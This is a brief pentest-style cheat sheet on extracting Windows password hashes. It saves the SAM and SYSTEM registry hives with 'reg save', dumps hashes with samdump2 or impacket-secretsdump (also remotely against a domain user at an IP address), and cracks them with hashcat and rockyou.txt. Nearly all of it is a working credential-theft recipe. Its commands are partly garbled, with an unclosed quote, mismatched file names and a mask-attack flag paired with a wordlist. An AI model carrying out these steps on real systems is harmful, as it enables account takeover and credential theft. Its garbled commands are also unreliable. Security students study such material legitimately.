SAM for window password

Location :- C:\Windows\system32\config (but can’t open it directly)

SAM(Security Account Manager) contains encrypted password

SYSTEM contains key to decrypt it

#Save SAM and SYSTEM file from cmd

1) reg save HKLM\sam sam

2) reg save HKLM\system system

• Crack

  • 1st method
    • samdump2 system sam
    • copy desired user line in hash.txt
    • hashcat -m 1000 -a 3 hashes.txt rockyou.txt

  • 2nd Method
    Sometime 1st method give wrong hash .Mostly in cash of hash starting with
    aad
    • impacket-secretsdump -sam SAM -system SYSTEM LOCAL

• We can also dump all password hash using
  
  impacket-secretsdump ‘<domain>/<user>@<ip>

sam